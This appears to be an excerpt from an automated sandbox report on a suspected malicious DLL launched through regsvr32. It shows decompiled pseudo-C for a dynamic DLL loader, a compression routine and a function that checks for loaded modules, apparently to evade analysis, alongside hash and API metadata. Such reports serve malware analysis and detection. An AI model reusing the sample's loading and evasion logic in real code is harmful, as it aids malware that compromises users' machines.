                            • Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
                            • Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                            • Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				char _v12;
                            				void _v140;
                            				signed char _t14;
                            				char _t15;
                            				intOrPtr _t20;
                            				void* _t25;
                            				intOrPtr _t26;
                            				intOrPtr _t32;
                            				WCHAR* _t34;
                            				intOrPtr _t35;
                            				struct HINSTANCE__* _t37;
                            				int _t38;
                            				intOrPtr _t46;
                            				void* _t47;
                            				intOrPtr _t50;
                            				void* _t60;
                            				void* _t61;
                            				char _t62;
                            				char* _t63;
                            				void* _t65;
                            				intOrPtr _t66;
                            				char _t68;
                            
                            				_t65 = __esi;
                            				_t61 = __edi;
                            				_t47 = __ebx;
                            				_t50 =  *0x1001e688; // 0x2d90590
                            				_t14 =  *(_t50 + 0x1898);
                            				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                            					_t15 = E100095E1(_t50, 0xb62);
                            					_t66 =  *0x1001e688; // 0x2d90590
                            					_t62 = _t15;
                            					_t67 = _t66 + 0xb0;
                            					_v8 = _t62;
                            					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
                            					_t20 =  *0x1001e688; // 0x2d90590
                            					asm("sbb eax, eax");
                            					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                            					_t63 = "\\";
                            					_t26 =  *0x1001e688; // 0x2d90590
                            					_t68 = E100092E5(_t26 + 0x1020);
                            					_v12 = _t68;
                            					E100085D5( &_v8);
                            					_t32 =  *0x1001e688; // 0x2d90590
                            					_t34 = E100092E5(_t32 + 0x122a);
                            					 *0x1001e784 = _t34;
                            					_t35 =  *0x1001e684; // 0x2e0faa0
                            					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                            					_t37 = LoadLibraryW( *0x1001e784);
                            					 *0x1001e77c = _t37;
                            					if(_t37 == 0) {
                            						_t38 = 0;
                            					} else {
                            						_push(_t37);
                            						_t60 = 0x28;
                            						_t38 = E1000E171(0x1001bb48, _t60);
                            					}
                            					 *0x1001e780 = _t38;
                            					E1000861A( &_v12, 0xfffffffe);
                            					memset( &_v140, 0, 0x80);
                            					if( *0x1001e780 != 0) {
                            						goto L10;
                            					} else {
                            						E1000861A(0x1001e784, 0xfffffffe);
                            						goto L8;
                            					}
                            				} else {
                            					L8:
                            					if( *0x1001e780 == 0) {
                            						_t46 =  *0x1001e6bc; // 0x2e0fbc8
                            						 *0x1001e780 = _t46;
                            					}
                            					L10:
                            					return 1;
                            				}
                            			}

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoadmemset
                            • String ID: %08x$dll
                            • API String ID: 3406617148-2963171978
                            • Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                            • Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
                            • Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                            • Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 99%
                            			E10012D70(int _a4, signed int _a8) {
                            				int _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				void* __esi;
                            				void* _t137;
                            				signed int _t141;
                            				intOrPtr* _t142;
                            				signed int _t145;
                            				signed int _t146;
                            				intOrPtr _t151;
                            				intOrPtr _t161;
                            				intOrPtr _t162;
                            				intOrPtr _t167;
                            				intOrPtr _t170;
                            				signed int _t172;
                            				intOrPtr _t173;
                            				int _t184;
                            				intOrPtr _t185;
                            				intOrPtr _t188;
                            				signed int _t189;
                            				void* _t195;
                            				int _t202;
                            				int _t208;
                            				intOrPtr _t217;
                            				signed int _t218;
                            				int _t219;
                            				intOrPtr _t220;
                            				signed int _t221;
                            				signed int _t222;
                            				int _t224;
                            				int _t225;
                            				signed int _t227;
                            				intOrPtr _t228;
                            				int _t232;
                            				int _t234;
                            				signed int _t235;
                            				int _t239;
                            				void* _t240;
                            				int _t245;
                            				int _t252;
                            				signed int _t253;
                            				int _t254;
                            				void* _t257;
                            				void* _t258;
                            				int _t259;
                            				intOrPtr _t260;
                            				int _t261;
                            				signed int _t269;
                            				signed int _t271;
                            				intOrPtr* _t272;
                            				void* _t273;
                            
                            				_t253 = _a8;
                            				_t272 = _a4;
                            				_t3 = _t272 + 0xc; // 0x452bf84d
                            				_t4 = _t272 + 0x2c; // 0x8df075ff
                            				_t228 =  *_t4;
                            				_t137 =  *_t3 + 0xfffffffb;
                            				_t229 =  <=  ? _t137 : _t228;
                            				_v16 =  <=  ? _t137 : _t228;
                            				_t269 = 0;
                            				_a4 =  *((intOrPtr*)( *_t272 + 4));
                            				asm("o16 nop [eax+eax]");
                            				while(1) {
                            					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                            					_t141 =  *_t8 + 0x2a >> 3;
                            					_v12 = 0xffff;
                            					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                            					if(_t217 < _t141) {
                            						break;
                            					}
                            					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                            					_t12 = _t272 + 0x5c; // 0x84e85000
                            					_t245 =  *_t11 -  *_t12;
                            					_v8 = _t245;
                            					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                            					_t247 =  <  ? _t195 : _v12;
                            					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                            					if(_t227 >= _v16) {
                            						L7:
                            						if(_t253 != 4) {
                            							L10:
                            							_t269 = 0;
                            							__eflags = 0;
                            						} else {
                            							_t285 = _t227 - _t195;
                            							if(_t227 != _t195) {
                            								goto L10;
                            							} else {
                            								_t269 = _t253 - 3;
                            							}
                            						}
                            						E10015D90(_t272, _t272, 0, 0, _t269);
                            						_t18 = _t272 + 0x14; // 0xc703f045
                            						_t19 = _t272 + 8; // 0x8d000040
                            						 *( *_t18 +  *_t19 - 4) = _t227;
                            						_t22 = _t272 + 0x14; // 0xc703f045
                            						_t23 = _t272 + 8; // 0x8d000040
                            						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                            						_t26 = _t272 + 0x14; // 0xc703f045
                            						_t27 = _t272 + 8; // 0x8d000040
                            						 *( *_t26 +  *_t27 - 2) =  !_t227;
                            						_t30 = _t272 + 0x14; // 0xc703f045
                            						_t31 = _t272 + 8; // 0x8d000040
                            						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                            						E10014AF0(_t285,  *_t272);
                            						_t202 = _v8;
                            						_t273 = _t273 + 0x14;
                            						if(_t202 != 0) {
                            							_t208 =  >  ? _t227 : _t202;
                            							_v8 = _t208;
                            							_t36 = _t272 + 0x38; // 0xf47d8bff
                            							_t37 = _t272 + 0x5c; // 0x84e85000
                            							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                            							_t273 = _t273 + 0xc;
                            							_t252 = _v8;
                            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                            							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                            							_t227 = _t227 - _t252;
                            						}
                            						if(_t227 != 0) {
                            							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
                            							_t273 = _t273 + 0xc;
                            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                            						}
                            						_t253 = _a8;
                            						if(_t269 == 0) {
                            							continue;
                            						}
                            					} else {
                            						if(_t227 != 0 || _t253 == 4) {
                            							if(_t253 != 0 && _t227 == _t195) {
                            								goto L7;
                            							}
                            						}
                            					}
                            					break;
                            				}
                            				_t142 =  *_t272;
                            				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                            				_a4 = _t232;
                            				if(_t232 == 0) {
                            					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                            					_t254 =  *_t83;
                            				} else {
                            					_t59 = _t272 + 0x2c; // 0x8df075ff
                            					_t224 =  *_t59;
                            					if(_t232 < _t224) {
                            						_t65 = _t272 + 0x3c; // 0x830cc483
                            						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                            						_t260 =  *_t66;
                            						__eflags =  *_t65 - _t260 - _t232;
                            						if( *_t65 - _t260 <= _t232) {
                            							_t67 = _t272 + 0x38; // 0xf47d8bff
                            							_t261 = _t260 - _t224;
                            							 *(_t272 + 0x6c) = _t261;
                            							memcpy( *_t67,  *_t67 + _t224, _t261);
                            							_t70 = _t272 + 0x16b0; // 0xdf750008
                            							_t188 =  *_t70;
                            							_t273 = _t273 + 0xc;
                            							_t232 = _a4;
                            							__eflags = _t188 - 2;
                            							if(_t188 < 2) {
                            								_t189 = _t188 + 1;
                            								__eflags = _t189;
                            								 *(_t272 + 0x16b0) = _t189;
                            							}
                            						}
                            						_t73 = _t272 + 0x38; // 0xf47d8bff
                            						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                            						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                            						_t225 = _a4;
                            						_t273 = _t273 + 0xc;
                            						_t76 = _t272 + 0x6c;
                            						 *_t76 =  *(_t272 + 0x6c) + _t225;
                            						__eflags =  *_t76;
                            						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                            						_t184 =  *_t78;
                            						_t79 = _t272 + 0x2c; // 0x8df075ff
                            						_t239 =  *_t79;
                            					} else {
                            						 *(_t272 + 0x16b0) = 2;
                            						_t61 = _t272 + 0x38; // 0xf47d8bff
                            						memcpy( *_t61,  *_t142 - _t224, _t224);
                            						_t62 = _t272 + 0x2c; // 0x8df075ff
                            						_t184 =  *_t62;
                            						_t273 = _t273 + 0xc;
                            						_t225 = _a4;
                            						_t239 = _t184;
                            						 *(_t272 + 0x6c) = _t184;
                            					}
                            					_t254 = _t184;
                            					 *(_t272 + 0x5c) = _t184;
                            					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                            					_t185 =  *_t81;
                            					_t240 = _t239 - _t185;
                            					_t241 =  <=  ? _t225 : _t240;
                            					_t242 = ( <=  ? _t225 : _t240) + _t185;
                            					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                            				}
                            				if( *(_t272 + 0x16c0) < _t254) {
                            					 *(_t272 + 0x16c0) = _t254;
                            				}
                            				if(_t269 == 0) {
                            					_t218 = _a8;
                            					__eflags = _t218;
                            					if(_t218 == 0) {
                            						L34:
                            						_t89 = _t272 + 0x3c; // 0x830cc483
                            						_t219 =  *_t272;
                            						_t145 =  *_t89 - _t254 - 1;
                            						_a4 =  *_t272;
                            						_t234 = _t254;
                            						_v16 = _t145;
                            						_v8 = _t254;
                            						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                            						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                            							_v8 = _t254;
                            							_t95 = _t272 + 0x5c; // 0x84e85000
                            							_a4 = _t219;
                            							_t234 = _t254;
                            							_t97 = _t272 + 0x2c; // 0x8df075ff
                            							__eflags =  *_t95 -  *_t97;
                            							if( *_t95 >=  *_t97) {
                            								_t98 = _t272 + 0x2c; // 0x8df075ff
                            								_t167 =  *_t98;
                            								_t259 = _t254 - _t167;
                            								_t99 = _t272 + 0x38; // 0xf47d8bff
                            								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                            								 *(_t272 + 0x6c) = _t259;
                            								memcpy( *_t99, _t167 +  *_t99, _t259);
                            								_t103 = _t272 + 0x16b0; // 0xdf750008
                            								_t170 =  *_t103;
                            								_t273 = _t273 + 0xc;
                            								__eflags = _t170 - 2;
                            								if(_t170 < 2) {
                            									_t172 = _t170 + 1;
                            									__eflags = _t172;
                            									 *(_t272 + 0x16b0) = _t172;
                            								}
                            								_t106 = _t272 + 0x2c; // 0x8df075ff
                            								_t145 = _v16 +  *_t106;
                            								__eflags = _t145;
                            								_a4 =  *_t272;
                            								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                            								_t234 =  *_t108;
                            								_v8 = _t234;
                            							}
                            						}
                            						_t255 = _a4;
                            						_t220 =  *((intOrPtr*)(_a4 + 4));
                            						__eflags = _t145 - _t220;
                            						_t221 =  <=  ? _t145 : _t220;
                            						_t146 = _t221;
                            						_a4 = _t221;
                            						_t222 = _a8;
                            						__eflags = _t146;
                            						if(_t146 != 0) {
                            							_t114 = _t272 + 0x38; // 0xf47d8bff
                            							E10014C30(_t255,  *_t114 + _v8, _t146);
                            							_t273 = _t273 + 0xc;
                            							_t117 = _t272 + 0x6c;
                            							 *_t117 =  *(_t272 + 0x6c) + _a4;
                            							__eflags =  *_t117;
                            							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                            							_t234 =  *_t119;
                            						}
                            						__eflags =  *(_t272 + 0x16c0) - _t234;
                            						if( *(_t272 + 0x16c0) < _t234) {
                            							 *(_t272 + 0x16c0) = _t234;
                            						}
                            						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                            						_t123 = _t272 + 0xc; // 0x452bf84d
                            						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                            						__eflags = _t257 - 0xffff;
                            						_t258 =  >  ? 0xffff : _t257;
                            						_t124 = _t272 + 0x2c; // 0x8df075ff
                            						_t151 =  *_t124;
                            						_t125 = _t272 + 0x5c; // 0x84e85000
                            						_t235 = _t234 -  *_t125;
                            						__eflags = _t258 - _t151;
                            						_t152 =  <=  ? _t258 : _t151;
                            						__eflags = _t235 - ( <=  ? _t258 : _t151);
                            						if(_t235 >= ( <=  ? _t258 : _t151)) {
                            							L49:
                            							__eflags = _t235 - _t258;
                            							_t154 =  >  ? _t258 : _t235;
                            							_a4 =  >  ? _t258 : _t235;
                            							__eflags = _t222 - 4;
                            							if(_t222 != 4) {
                            								L53:
                            								_t269 = 0;
                            								__eflags = 0;
                            							} else {
                            								_t161 =  *_t272;
                            								__eflags =  *(_t161 + 4);
                            								_t154 = _a4;
                            								if( *(_t161 + 4) != 0) {
                            									goto L53;
                            								} else {
                            									__eflags = _t154 - _t235;
                            									if(_t154 != _t235) {
                            										goto L53;
                            									} else {
                            										_t269 = _t222 - 3;
                            									}
                            								}
                            							}
                            							_t131 = _t272 + 0x38; // 0xf47d8bff
                            							_t132 = _t272 + 0x5c; // 0x84e85000
                            							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                            							_t134 = _t272 + 0x5c;
                            							 *_t134 =  *(_t272 + 0x5c) + _a4;
                            							__eflags =  *_t134;
                            							E10014AF0( *_t134,  *_t272);
                            						} else {
                            							__eflags = _t235;
                            							if(_t235 != 0) {
                            								L46:
                            								__eflags = _t222;
                            								if(_t222 != 0) {
                            									_t162 =  *_t272;
                            									__eflags =  *(_t162 + 4);
                            									if( *(_t162 + 4) == 0) {
                            										__eflags = _t235 - _t258;
                            										if(_t235 <= _t258) {
                            											goto L49;
                            										}
                            									}
                            								}
                            							} else {
                            								__eflags = _t222 - 4;
                            								if(_t222 == 4) {
                            									goto L46;
                            								}
                            							}
                            						}
                            						asm("sbb edi, edi");
                            						_t271 =  ~_t269 & 0x00000002;
                            						__eflags = _t271;
                            						return _t271;
                            					} else {
                            						__eflags = _t218 - 4;
                            						if(_t218 == 4) {
                            							goto L34;
                            						} else {
                            							_t173 =  *_t272;
                            							__eflags =  *(_t173 + 4);
                            							if( *(_t173 + 4) != 0) {
                            								goto L34;
                            							} else {
                            								_t88 = _t272 + 0x5c; // 0x84e85000
                            								__eflags = _t254 -  *_t88;
                            								if(_t254 !=  *_t88) {
                            									goto L34;
                            								} else {
                            									return 1;
                            								}
                            							}
                            						}
                            					}
                            				} else {
                            					return 3;
                            				}
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
                            • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 70%
                            			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                            				char _v516;
                            				char _v556;
                            				char _v564;
                            				char _v568;
                            				char _v572;
                            				char _v576;
                            				intOrPtr _v580;
                            				char _v588;
                            				signed int _v596;
                            				intOrPtr _v602;
                            				intOrPtr _v604;
                            				char _v608;
                            				CHAR* _v612;
                            				CHAR* _v616;
                            				signed int _v620;
                            				signed int _v624;
                            				signed int _v628;
                            				signed int _v632;
                            				char _v636;
                            				intOrPtr _t119;
                            				signed int _t122;
                            				CHAR* _t124;
                            				intOrPtr _t125;
                            				CHAR* _t127;
                            				WCHAR* _t130;
                            				intOrPtr _t133;
                            				intOrPtr _t137;
                            				WCHAR* _t138;
                            				intOrPtr _t142;
                            				WCHAR* _t143;
                            				CHAR* _t144;
                            				intOrPtr _t145;
                            				intOrPtr _t150;
                            				intOrPtr _t153;
                            				WCHAR* _t154;
                            				signed int _t159;
                            				WCHAR* _t160;
                            				intOrPtr _t163;
                            				intOrPtr _t165;
                            				intOrPtr _t166;
                            				intOrPtr _t170;
                            				signed int _t173;
                            				signed int _t178;
                            				intOrPtr _t182;
                            				WCHAR* _t184;
                            				char _t186;
                            				WCHAR* _t188;
                            				intOrPtr _t200;
                            				intOrPtr _t211;
                            				signed int _t215;
                            				char _t220;
                            				WCHAR* _t231;
                            				intOrPtr _t235;
                            				intOrPtr _t238;
                            				intOrPtr _t239;
                            				intOrPtr _t246;
                            				signed int _t248;
                            				WCHAR* _t249;
                            				CHAR* _t250;
                            				intOrPtr _t262;
                            				void* _t271;
                            				intOrPtr _t272;
                            				signed int _t277;
                            				void* _t278;
                            				intOrPtr _t280;
                            				signed int _t282;
                            				void* _t298;
                            				void* _t299;
                            				intOrPtr _t305;
                            				CHAR* _t326;
                            				void* _t328;
                            				WCHAR* _t329;
                            				intOrPtr _t331;
                            				WCHAR* _t333;
                            				signed int _t335;
                            				intOrPtr* _t337;
                            				void* _t338;
                            				void* _t339;
                            				void* _t353;
                            
                            				_t353 = __fp0;
                            				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                            				_t119 =  *0x1001e688; // 0x2d90590
                            				_v620 = _v620 & 0x00000000;
                            				_t328 = __ecx;
                            				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                            					L7:
                            					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
                            					E1000A86D( &_v556, _t14, _t351);
                            					_t298 = 0x64;
                            					_t122 = E1000A471( &_v556, _t298);
                            					 *0x1001e748 = _t122;
                            					if(_t122 != 0) {
                            						_push(0x4e5);
                            						_t299 = 0x10;
                            						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
                            						 *_t337 = 0x610;
                            						_t124 = E100095E1(0x1001b9cc);
                            						_push(0);
                            						_push(_t124);
                            						_v612 = _t124;
                            						_t125 =  *0x1001e688; // 0x2d90590
                            						_t127 = E100092E5(_t125 + 0x228);
                            						_t338 = _t337 + 0xc;
                            						_v616 = _t127;
                            						E100085D5( &_v612);
                            						_t130 = E1000B269(_t127);
                            						_t246 = 3;
                            						__eflags = _t130;
                            						if(_t130 != 0) {
                            							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                            							 *_t328 = _t246;
                            						}
                            						E1000861A( &_v616, 0xfffffffe);
                            						_t133 =  *0x1001e688; // 0x2d90590
                            						_t22 = _t133 + 0x114; // 0x2d906a4
                            						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
                            						_t262 =  *0x1001e688; // 0x2d90590
                            						_t339 = _t338 + 0x14;
                            						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                            						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                            							L17:
                            							asm("stosd");
                            							asm("stosd");
                            							asm("stosd");
                            							asm("stosd");
                            							asm("stosd");
                            							_v572 = _t328;
                            							_v576 =  *((intOrPtr*)(_t262 + 0x214));
                            							_t137 =  *0x1001e680; // 0x0
                            							_t138 =  *(_t137 + 8);
                            							__eflags = _t138;
                            							if(_t138 != 0) {
                            								 *_t138(0, 0, 1,  &_v568,  &_v564);
                            							}
                            							_v620 = _v620 & 0x00000000;
                            							E1000E2C6(_t353,  &_v576);
                            							_pop(_t262);
                            							_t142 =  *0x1001e6b4; // 0x2e0fc48
                            							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                            							__eflags = _t143;
                            							if(_t143 == 0) {
                            								E1000E2C6(_t353,  &_v588);
                            								_t235 =  *0x1001e6b4; // 0x2e0fc48
                            								_pop(_t262);
                            								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                            							}
                            							__eflags =  *0x1001e73c;
                            							if( *0x1001e73c <= 0) {
                            								goto L36;
                            							} else {
                            								_t165 =  *0x1001e680; // 0x0
                            								__eflags =  *(_t165 + 8);
                            								if( *(_t165 + 8) != 0) {
                            									_t231 =  *(_t165 + 0xc);
                            									__eflags = _t231;
                            									if(_t231 != 0) {
                            										 *_t231(_v580);
                            									}
                            								}
                            								_t166 =  *0x1001e688; // 0x2d90590
                            								_t262 =  *((intOrPtr*)(_t166 + 0x214));
                            								__eflags = _t262 - _t246;
                            								if(_t262 == _t246) {
                            									goto L36;
                            								} else {
                            									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                            									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                            										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                            										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                            											E100049A5();
                            											asm("stosd");
                            											asm("stosd");
                            											asm("stosd");
                            											asm("stosd");
                            											_t170 =  *0x1001e684; // 0x2e0faa0
                            											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                            											_t262 = _v602;
                            											_t248 = 0x3c;
                            											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                            											_v596 = _t173;
                            											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                            											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                            											_v624 = _t178;
                            											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                            											_t182 =  *0x1001e688; // 0x2d90590
                            											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
                            											_t339 = _t339 + 0xc;
                            											__eflags = _t184;
                            											if(_t184 >= 0) {
                            												_t333 = E10008604(0x1000);
                            												_v616 = _t333;
                            												_pop(_t262);
                            												__eflags = _t333;
                            												if(_t333 != 0) {
                            													_t186 = E1000109A(_t262, 0x148);
                            													_t305 =  *0x1001e688; // 0x2d90590
                            													_v636 = _t186;
                            													_push(_t305 + 0x648);
                            													_push(0xa);
                            													_push(7);
                            													_t271 = 2;
                            													E1000902D(_t271,  &_v572);
                            													_t272 =  *0x1001e688; // 0x2d90590
                            													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
                            													_t339 = _t339 + 0x18;
                            													_v632 = _t188;
                            													__eflags = _t188;
                            													if(_t188 != 0) {
                            														_push(_v624 % _t248 & 0x0000ffff);
                            														_push(_v628 & 0x0000ffff);
                            														_push(_v596 % _t248 & 0x0000ffff);
                            														_push(_v620 & 0x0000ffff);
                            														_push(_v632);
                            														_push( &_v572);
                            														_t200 =  *0x1001e688; // 0x2d90590
                            														__eflags = _t200 + 0x1020;
                            														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
                            														E100085D5( &_v636);
                            														E1000A911(_t333, 0, 0xbb8, 1);
                            														E1000861A( &_v632, 0xfffffffe);
                            														_t339 = _t339 + 0x44;
                            													}
                            													E1000861A( &_v616, 0xfffffffe);
                            													_pop(_t262);
                            												}
                            											}
                            										}
                            										goto L36;
                            									}
                            									__eflags = _t262 - 2;
                            									if(_t262 != 2) {
                            										goto L36;
                            									}
                            									E100049A5();
                            									asm("stosd");
                            									asm("stosd");
                            									asm("stosd");
                            									asm("stosd");
                            									_t211 =  *0x1001e684; // 0x2e0faa0
                            									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                            									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                            									_v628 = _t215;
                            									_t277 = 0x3c;
                            									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                            									_t249 = E10008604(0x1000);
                            									_v624 = _t249;
                            									_pop(_t278);
                            									__eflags = _t249;
                            									if(_t249 != 0) {
                            										_t220 = E100095E1(_t278, 0x32d);
                            										_t280 =  *0x1001e688; // 0x2d90590
                            										_push(_t280 + 0x228);
                            										_t282 = 0x3c;
                            										_v636 = _t220;
                            										_push(_v628 % _t282 & 0x0000ffff);
                            										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                            										E100085D5( &_v636);
                            										E1000A911(_t249, 0, 0xbb8, 1);
                            										E1000861A( &_v624, 0xfffffffe);
                            									}
                            									goto L41;
                            								}
                            							}
                            						} else {
                            							_t238 =  *((intOrPtr*)(_t262 + 0x214));
                            							__eflags = _t238 - _t246;
                            							if(_t238 == _t246) {
                            								goto L17;
                            							}
                            							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                            							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                            								L36:
                            								_t144 = E100095E1(_t262, 0x610);
                            								_push(0);
                            								_push(_t144);
                            								_v616 = _t144;
                            								_t145 =  *0x1001e688; // 0x2d90590
                            								_t329 = E100092E5(_t145 + 0x228);
                            								_v612 = _t329;
                            								__eflags = _t329;
                            								if(_t329 != 0) {
                            									_t160 = E1000B269(_t329);
                            									__eflags = _t160;
                            									if(_t160 != 0) {
                            										_t163 =  *0x1001e684; // 0x2e0faa0
                            										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                            									}
                            									E1000861A( &_v612, 0xfffffffe);
                            								}
                            								E100085D5( &_v616);
                            								_t150 =  *0x1001e688; // 0x2d90590
                            								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
                            								_t153 =  *0x1001e688; // 0x2d90590
                            								_t154 = _t153 + 0x228;
                            								__eflags = _t154;
                            								lstrcpynW(_t154,  *0x1001e738, 0x105);
                            								_t331 =  *0x1001e688; // 0x2d90590
                            								_t117 = _t331 + 0x228; // 0x2d907b8
                            								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
                            								E1000861A(0x1001e740, 0xfffffffe);
                            								E1000861A(0x1001e738, 0xfffffffe);
                            								L41:
                            								_t159 = 0;
                            								__eflags = 0;
                            								L42:
                            								return _t159;
                            							}
                            							__eflags = _t238 - 2;
                            							if(_t238 != 2) {
                            								goto L36;
                            							}
                            							goto L17;
                            						}
                            					}
                            					L8:
                            					_t159 = _t122 | 0xffffffff;
                            					goto L42;
                            				}
                            				_t250 = E100095C7(0x6e2);
                            				_v616 = _t250;
                            				_t326 = E100095C7(0x9f5);
                            				_v612 = _t326;
                            				if(_t250 != 0 && _t326 != 0) {
                            					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                            						_v620 = 1;
                            					}
                            					E100085C2( &_v616);
                            					_t122 = E100085C2( &_v612);
                            					_t351 = _v620;
                            					if(_v620 != 0) {
                            						goto L8;
                            					}
                            				}
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
                            • GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
                            • lstrcpynW.KERNEL32(02D90158,00000105), ref: 1000526F
                            • lstrcpynW.KERNEL32(02D90368,00000105), ref: 10005283
                            Memory Dump Source
